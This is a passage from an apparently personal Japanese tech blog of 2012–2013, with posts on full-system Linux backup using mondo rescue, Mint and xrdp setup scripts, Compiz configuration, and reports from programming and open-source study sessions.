色々動画見たい場合等、キーボードやマウスで操作するのが面倒だけどダラダラ
見たい時に、手元のスマフォでリモート操作できて大変便利ですw

以上、ちょっと駆け足気味に軽く紹介しました。

Linuxシステム全体をイメージファイルにバックアップする

2013-08-01T19:02:00.001+09:00

実家にちょっと特殊に作り込んだLinuxサーバを構築したのですが
万が一システムが吹っ飛んだりしたらものすごく苦労したので目も当てられません。
なので、システム全体をバックアップして万が一に備えたいと思います。

バックアップの種類は色々あると思いますが、今回はOSそのものをイメージファイル
形式にバックアップできるソフトウェアという条件で探しました。

もともとpartcloneというツールを使ったことがあったのですが、このツールだと
マウント済みのシステムはバックアップが取れないので、ssh経由でバックアップする
とかが出来ず、USBメモリからLiveシステムを起動してバックアップしてと
物理的に手間がかかります。

今回使ってみたのが mondo rescue というツール。
以下手順。(検証はUbuntu 12.04 LTS版 32bitで行いました。)

すんなりapt-getで入らないので、下記コマンドを実行してインストールします。

$ cd /etc/apt/sources.list.d/
$ sudo wget ftp://ftp.mondorescue.org/ubuntu/12.04/mondorescue.sources.list
$ sudo apt-get update
$ sudo apt-get -y install mondo

マニュアルを読みたい場合は下記で。

$ man mondoarchive

日本語の情報ではこちらのサイトが非常によくまとまっておりました。

http://www.asahi-net.or.jp/~aa4t-nngk/mondo.html

ただし、情報が古いのかわからないのですが、特定ディレクトリを除外するオプション
である「-E」オプションの使い方がちょっと最新のmondoだと違うっぽいです。
manを見て気付きましたが、上記サイトには

# mondoarchive -E "/some/path /another/path"

といった形でダブルクォートで全体を囲みつつディレクトリはスペースで区切ると書いてありますが
manによると

# mondoarchive -E "/some/path|/another/path"

のように、「|」(パイプ)で区切るのが正しいようです。
私の場合、下記コマンドでバックアップしてみました。

$ sudo mondoarchive -Oi -L -d /mnt/500g/backup/mondo/ -6 -S /var/mondo/scratch/ -T /var/mondo/tmp/ -E "/var/data|/mnt" -s 44800m

一応採用したオプションの意味を書きますと -Oi → ISOイメージ形式にバックアップする
-L → LZO形式に圧縮する(gzipやbz2より良いと個人的に思っている為)
-d → どのディレクトリにバックアップするか
-6 → 圧縮レベル(0で無圧縮、9で最高圧縮です。)
-S → scratch作業用ディレクトリ(適当な空ディレクトリ指定で良いようです)
-T → tmpディレクトリ(適当な空ディレクトリ指定で良いようです)
-E → バックアップから除外するディレクトリの指定(/var/data/　と /mnt/ を除外しました。)
-s → 出来上がるISOファイルの最大サイズ。このサイズを超えると分割されます。1ファイルにまとめたかったので適当に40GB程を指定して分割されないようにしています。
バックアップが終わったファイルは3.5GBになりました。
バックアップ対象は6.2GBなので半分よりちょっと大きいサイズになったという感じでしょうか。
-6指定を-9指定にすればもっと小さくなるでしょうが時間かかりそうなのでやめておきます。

まだリストアの検証はしていませんが、もしリストアする機会がありましたらまた記事書くかもです。
※業務で使うならちゃんとリストア検証もしておきましょう・・ｗ

-- 追記 --
mindi パッケージが「認証されていません。検証なしにインストールしますか？」といった
警告が出てきてしまいますので、下記コマンドを実行しておきましょう。

$ wget ftp://ftp.mondorescue.org/ubuntu/12.04/mondorescue.pubkey -O - | sudo apt-key add -

Linux mint MATE関連シェルスクリプト

2013-07-12T04:56:00.000+09:00

Linux mint MATE クリーンインストール時の自分用スクリプト。
日本語化

#!/bin/sh

wget -q http://linuxmint-jp.net/linuxmint-ja-archive-keyring.gpg -O- | sudo apt-key add -
sudo wget http://linuxmint-jp.net/sources.list.d/linuxmint-ja.list -O /etc/apt/sources.list.d/linuxmint-ja.list
sudo apt-get -y update
sudo apt-get -y dist-upgrade
sudo apt-get -y install mint-gnome-ja

xrdp日本語キーレイアウトFix

#!/bin/sh

cd /etc/xrdp
wget http://www.mail-archive.com/xrdp-devel@lists.sourceforge.net/msg00263/km-e0010411.ini
mv -v km-e0010411.ini km-0411.ini 
chmod -v 644 km-0411.ini 
ln -sv km-0411.ini km-e0010411.ini 
ln -sv km-0411.ini km-e0200411.ini 
ln -sv km-0411.ini km-e0210411.ini

Linux MINT Mate Compiz 有効化

2013-03-17T15:39:00.001+09:00

ちょっとメモ程度に貼り付け。

How to install compiz on Linux Mint 14 Nadia Mate edition:

1- install the followig packages:

- compiz-gnome
- compizconfig-settings-manager
- fusion-icon
- compiz-plugins-extra
- libdecoration0-dev

2- In terminal run "compiz --replace" or run Compiz Fusion Icon and choose compiz as your window manager.

3- Go to Startup Applications click on add and in the name field write "compiz" and in the command field enter "compiz --replace"(without the punctuation) click on Add again then Close. This is to make compiz start automatically on next logins.

4- To stop that high CPU usage run in terminal “mateconf-editor”. When the editor opens go to /desktop/mate/session/required_components/windowmanager and replace "marco" with "compiz".

3- install "dconf-editor" by runnig in terminal:

sudo apt-get install dconf-tools

Then press ALT + F2 and run: "dconf-editor", navigate to org > gnome > desktop > vm > preferences and change the "theme" value from "Adwaita" to any other installed theme you want. Remember this because in the same place you can also change the window button layout, among others.

4- Start the Compiz Configuration Settings Manager and check "Move Window" and "Move Window" and any other functions you want to activate.

5- To remove compiz with all related packages (dependencies) run in terminal:

sudo apt-get purge compiz compiz-plugins-main-default libcompizconfig0

Warning: Removing compiz also removes the packages unity & ubuntu-desktop.

Warning: Removing libcompizconfig0 also removes ubuntu-tweak.

Thus you will lose the ability to log into the unity or unity-2d desktops if you have them installed on your Mint.

Note: if you uninstall compiz you have to prompt a terminal and run “mateconf-editor” and when the editor opens go to /desktop/mate/session/required_components/windowmanager and replace "compiz" with "marco".

Note: compiz has been forked for Mate a few months back. You can find it at http://forums.linuxmint.com/viewtopic.php?f=217&t=114613 with a complete tutorial as on how to install it !! Check it out It rocks!!

プログラミング生放送勉強会第21回＠福岡 #pronama 参加その後・・

2013-03-16T21:20:00.000+09:00

プログラミング生放送勉強会第21回＠福岡 #pronama

参加してきました。

プロ生なるものを初めて知ったのですが、~~プロ生ちゃんマジ天使~~

面白そうだったので参加しました。

参加を決める決定打は、アセンブラに関するセッションがあること。

以下自分なりに軽くまとめます。

1. ディスプレイよりこっち側をプログラミング

組み込み基盤になんかマリオのコインの音出力させてた。

まぁこういう世界もあるんだなぁと、ハードウェアプログラミングとは

無縁の私にはよくわかりませんでした・・。すみません。

2. Androidのテストってどないすんねん！

自分が一番関わる可能性が高い、一番実務的に勉強になったのがこのセッション。

会場のメモそのまま貼り付け。

UIテストの自動化（バージョンアップ時、新機種登場時）

- Android SDK標準のテスティングフレームワークは使いづらい

ドメインロジックの分離

・Webアプリケーションとアプローチは同じ

（何でもActivityに書くのはダメ）

・Androidに依存しなければJUNITで普通にテストが書ける。

　JUNIT4とか使える

画面構成に依存したテストは書かない

NativeDriverを使用する

Activityを操作するDriverクラスを作って、Driverクラス経由でActivityを

操作してテストする

Androidでテストせず普通のJavaクラスとしてJUINTでテストする。

ビジネスロジックの品質はこちらで担保

UIテストでは、NativeDriverを使うのが良い。テストを書くにも保守するにもコストがかかる。

リスクと費用対効果の観点から集中が必要。

設計段階でテスタビリティを考慮すること。

DI(RoboGuiceなど）やモックライブラリ（Mockitoなど）を導入する

テストカバレッジ100％はプロジェクトが炎上するから割り切りが必要。

3. 温故知新、アセンブリ言語を触ってみる

このセッション、実はこれが一番目当てのセッションで参加した。

セッション参加してみての感想としては、参加して良かった！

わざわざ足を運んだかいがあった！という感じ。

専門学校時代にCASL2をかじった程度の自分には内容は難しく感じたものの、

本物のアセンブリのソースがチラチラ見れたり解説がわかりやすく

大変興味深かった。

とりあえず「お〜！なるほど！」と思ったのが

xor eax,eax でeaxは0になるんだよね（move eax,0 よりはやい)

即値(リテラル)を使うより、上記のように0を算出したほうが高速に動作するらしいという事。

専門学校時代に「XORっていうのは、違ったら1で同じだったら0になるんだよ！」

と習ったのを思い出しました。

上記のソースで言うと eaxとeaxは同じものだから、必ず0になるんですね。

4. FPGA でおれおれコンピュータつくるよ

プレゼン中にプレゼン資料をWindowsのペイントで手書きしながらプレゼンするという

発表スタイルが周りの笑いを誘うｗ

内容は難しく正直ほとんど理解できなかったのが私の未熟なところ。

いやーしかし凄い、頭の中に全部入ってないとあんな即興的なプレゼンは

出来ないと思う。天才なんだろうなぁ・・・・・・。

以下LT(ライトニングトーク)があったんですが、一言書くとするなら

LISPer 怖ぇぇ・・・・・。

お疲れ様でした。

自分がなにかLTで発表するようなネタを持っているかな？と

考えを巡らせてみたりするんですが、特に凄いプログラミング能力を

持っているわけでもないし、話が得意というわけでもなく

自分が得意なことと言えばLinuxの事かなぁ〜？ぐらいで

なんかまだまだLTとか出来る気がしません。

セキュリティの勉強会で自己紹介すら満足に出来なかったレベルじゃ

まだまだ敷居が高そうですね・・・・。

Java セキュアコーディングセミナー @福岡参加

2012-12-09T19:09:00.001+09:00

Java セキュアコーディングセミナー @福岡に本日参加してきました。
参加しての感想・・・・
内容が凄く濃かった・・・。
自分みたいななんとなくJavaのコード書いてるぜ！っていう程度の人間では
セミナーの解説についていくのに必死。
ノートパソコン持参でハンズオン(実際にコードを書いたりしてみる事)形式
だったので、非常に良かったです。

みんな当たり前のように英語のドキュメントをサクサク読み進めるのね・・・・。
インフラ上がりなのでインフラ関係では海外サイトとか見て情報取得して
構築したりしていましたが、開発のAPIドキュメントとかを
英語だけで理解して使いこなすのはとても難しそうに感じます。

やはり今の課題は「英語」に尽きるのかな・・・・。英語力ほんと重要。
ソフトウェアの翻訳をボランティアでこなしつつ英語力をつけようかと
思ったりしています。

全く普段意識したこともないような細かいJavaの言語仕様について
きっちりと説明されていたので、大変有意義でした。
参加してみて、あまりの自分のレベルの低さに愕然としました。

まだまだ駆け出しプログラマ。これからも積極的にこういった素晴らしい
勉強会に参加して、スキルアップをすべきだなと痛感しました。

さて、今日のセミナーの復習をしましょう・・・・・・・・。

オープンソースカンファレンス福岡 2012 参加してみての感想

2012-12-09T18:39:00.003+09:00

オープンソースカンファレンス福岡２０１２
https://www.ospn.jp/osc2012-fukuoka/

参加してきました。参加したセッション一覧は下記。

10:00 - 10:45
OSSライセンスの初歩

11:00 - 11:45
Androidセキュアコーディング

12:00 - 12:45
オープンソースソフトウェアの翻訳をやらないか

13:00 - 13:45
jus研究会福岡大会「IT業界を良くする方法」

14:00 - 14:45
オープンソースの総合オフィスソフトLibreOfficeの最新動向

15:15 - 16:00
事例からみるLibreOffice導入ガイド

16:15-17:00
OpenSUSEで始める脆弱性管理入門

OSSライセンスの初歩はちょっと遅れてしまったので途中からになっちゃいましたが
やはりライセンスはちょっと難しい。セッション聞いただけではまだまだ全然
理解不足だと思います。

Androidセキュアコーディングは、SQLite扱うときに .dbファイルの
パーミッションに気をつけろよ、SQLiteHelperクラスが推奨だよっていう
感じの内容でした。otherにread権限持たせると他アプリからDBの内容
読めると。ふむふむ。

オープンソースソフトウェアの翻訳をやらないか　セッションは
Ubuntuのソフトウェアを題材に実際に翻訳ってどうやるのっていう
プロセスがデモでされたのがとても分かりやすくてよかった。
時間を作って翻訳のお手伝いをしてみたいなと思った次第。
あ、でも英語力・・・　英語勉強します＞＜

jus研究会福岡大会「IT業界を良くする方法」について。
もっと一人ひとりのタスク量を減らすとか、IT系だからこそもっとITを活用(VPNとか
Redmineとか。エクセルで手作業、え？なにそれ美味しいの？)すべきって
感じの内容でディスカッション。勉強になりました。

オープンソースの総合オフィスソフトLibreOfficeの最新動向は、講師がかっこよかった
んですが、具体的にMS Officeから移行する技術的な要素というのを
期待していただけにちょっと扱うトピックが違ったのかなという印象。
ただ色々なところで使われだしているんですな。

事例からみるLibreOffice導入ガイドもう１個LibreOfficeセッションに参加した。
こちらは実際にLibreOffice導入プロジェクトでどういう点に苦労したかとか
それをどうやって解決したといったエピソードの紹介。
聞いてて思ったのが、一般ユーザはそこまでリテラシが無いので、移行は相当
大変だという事・・・。結局MS Officeを根絶することはできずにハイブリッド運用
になってしまっているあたり、なんとも・・・LibreOfficeへ完全移行する方法
みたいなのを期待していただけに現実は厳しいなぁと痛感。MSめ・・・・。

OpenSUSEで始める脆弱性管理入門 OpenVASでセキュリティ診断っていう
内容で期待していたセッション。当日までに実際にOpenVASを動かして予習
していたものの、実際のセッションでは講師のPCに問題が発生してデモは
急遽中止に。うーん、残念。どっちかって言うとOpenVASの話より
SUSE Linuxの話が多めだったような。YAST？なにそれ美味しいの？apt-getの
ほうがいいよ！　とか思ったり。

上のフロアで展示ブースとかやってたみたいだけど、全部の時間のセッションに参加
してしまったので展示ブースは見られず・・・。
ちょっと空けて展示ブース行けばよかったなと後悔。

色々刺激にはなったので、また来年も参加しようと思います。

Lubuntu環境で、プリインストールの不要なゲームを削除する

2012-11-19T23:20:00.000+09:00

Lubuntuインストール後、ソリティア(のGNU版)とかゴルフとか
色々要らないゲームが入っています。
これを簡単に全て削除する方法。

以下のコマンド一発でOK

$ sudo apt-get purge ace-of-penguins

ちなみに元ネタはこちら
http://lubuntu.net/blog/lubuntu-screencast-removing-games-short-introduction-metapackages

このビデオだとGUIでやってるけど、上記コマンド一発の方が早い。

JavaCodingStandard2004 読んだ

2012-10-15T22:01:00.000+09:00

http://ja.scribd.com/doc/220015/JavaCodingStandard2004
↑これ、JavaCodingStandard2004 今日全部読んだ。
自分みたいな元インフラ技術者で、ここ１年以内ぐらいでプログラマになった
人間からすれば、とてもありがたくて体系的にまとまっている文章で
とても勉強になった。Javaはまだ初心者かな？と思う初心者のかたも
自分はJavaならかなりイケる！って自信ある方も一度目を通すといいかも。

内容には納得できる説明とサンプルコードが掲載されていて理解しやすかった。
かなり個人的には良いドキュメントだと思ったのでブログで広めてみたりしてみたり。

やっぱりプログラマなら分かりやすくて綺麗なコード書きたいよね。

Linux環境でFreenetが自動起動してしまう問題

2012-10-10T19:15:00.000+09:00

Lubuntu環境でFreenetをとりあえずインストールしてみたんですが
なんかOS起動するたびに異常に重いので調べてみるとプロセス名 java が
CPUを70％程食ってました。なんだろうと調査してみると正体はFreenet。

どこで勝手に起動しているのだろうかと調べてもなかなかトリガが見つからず。
やっと見つけたのが、超以外な場所にありました。

$ crontab -l
@reboot   "/home/【ユーザ名】/Freenet/run.sh" start 2>&1 >/dev/null #FREENET AUTOSTART - 8888

インストーラが勝手に自動起動をcronに仕込むとは斬新すぎる・・・。
コメントアウトして無効化してやりました。

Lubuntu 12.04 で快適なリモートデスクトップ環境を構築する

2012-07-24T20:06:00.003+09:00

Linux版のリモートデスクトップサーバ（以下RDPサーバ）の実装に xrdp というパッケージが

あります。しかしLubuntu 12.04へインストールするだけでは正常に接続できません。

まずはそれの修正。

xrdpだけじゃなくて下記パッケージも必要みたい。

$ sudo apt-get install xrdp xvfb vnc4server lxde-common

これをインストールして

$ sudo /etc/init.d/xrdp restart

で、xrdpサーバを再起動する。
上記まででRDPクライアントから接続可能になります。

そのままではキーボードが英語キーボードなので、

xrdp 0.5.0 の日本語キーマップ
http://www.eonet.ne.jp/~smallbear/X/xrdp-jpkeymap.html

上記サイトの通りに作業する。
これで正常に日本語キーボードになり快適なリモートデスクトップ環境が構築できます！
VNCよりオススメです。